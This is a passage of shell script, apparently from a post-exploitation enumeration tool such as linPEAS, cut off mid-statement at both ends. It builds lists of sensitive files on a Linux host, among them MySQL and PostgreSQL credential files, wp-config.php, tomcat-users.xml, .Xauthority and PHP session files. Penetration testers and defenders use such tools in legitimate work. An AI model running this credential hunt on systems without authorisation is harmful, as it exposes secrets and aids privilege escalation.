"^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "crontab\.db$|crontab-ui\.service$" | sort | uniq | head -n 70) + PSTORAGE_SYSTEMD=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}sys|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}system|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}private|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}media|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}run|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}sys|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}system|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}private|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}media|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}run|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}sys|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}system|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}private|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}media|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}run|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc|^${ROOT_FOLDER}usr" | grep -E "system\.d$|system-local\.d$|session\.d$|system-services$|services$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "mysql$|passwd\.ibd$|password.*\.ibd$|pwd\.ibd$|mysqld\.cnf$|\.mylogin\.cnf$" | sort | uniq | head -n 70) + PSTORAGE_MARIADB=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$|\.pgpass$|pgadmin4\.db$" | sort | uniq | head -n 70) + PSTORAGE_APACHE_NGINX=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$|nginx\.conf$|nginx$" | sort | uniq | head -n 70) + PSTORAGE_VARNISH=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "varnish$" | sort | uniq | head -n 70) + PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^${ROOT_FOLDER}var|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}private|^${ROOT_FOLDER}tmp" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_APACHE_AIRFLOW=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "airflow\.cfg$|webserver_config\.py$" | sort | uniq | head -n 70) + PSTORAGE_X11=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.Xauthority$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) + PSTORAGE_DRUPAL=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '/default/settings.php' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_MOODLE=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E 'moodle/config.php' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "config\.php$" | sort | uniq | head -n 70) + PSTORAGE_TOMCAT=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) + PSTORAGE_MONGO=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ROCKETCHAT=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "rocketchat\.service$" | sort | uniq | head -n 70) + PSTORAGE_SUPERVISORD=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CESI=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) + PSTORAGE_RSYNC=$(echo -e 